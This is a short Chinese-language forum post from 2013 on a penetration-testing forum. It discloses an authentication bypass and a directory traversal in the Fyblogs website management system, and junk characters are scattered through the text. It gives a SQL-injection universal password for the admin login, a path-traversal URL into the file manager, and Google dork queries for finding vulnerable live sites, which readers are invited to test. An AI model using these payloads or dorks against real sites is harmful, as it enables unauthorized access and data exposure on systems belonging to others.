中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过7 a1 B4 H7 H/ h. v: Y# @$ w" s
  v+ j* [( P. d  N' R0 |9 {
简要描述:
3 S: P7 A# b" ~2 X+ V3 A# p: Z6 k4 p
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% x8 g6 o: G8 p  G
8 N8 ?& w$ n7 j+ V. Y; D/ Y3 q详细说明:
; |( O% M; F# _3 R; w8 Z* u) O4 ]/ J9 L0 T9 j; h0 D
后台万能密码 'or'='or'
+ [' @5 U/ ?, Z, i. D7 w3 X后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!- M1 f- U( [# n8 a9 m. n5 N
admin/uploadfile.asp?currentFolder=/upfiles/../  ]0 ^. A) G( W7 F5 m" x
* N* u/ F/ x. q9 U
漏洞证明:- u. K$ y* e# `- b7 l, P
' u% z1 S8 H/ j( k3 z6 N
谷歌:inurl:type.asp?id=1 新闻中心
0 |$ P  c8 m# L8 C! n或者 :inurl:download_ok.asp?
( w- L$ O& X0 l' s2 o
* m+ j  D' o* @  P! C- O* c可以测试8 j+ U6 b# N! `7 k& ]1 X* q5 Z

/ @9 P) L1 k7 J7 E* v  o$ N, z' S* @  `$ m( A  {




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2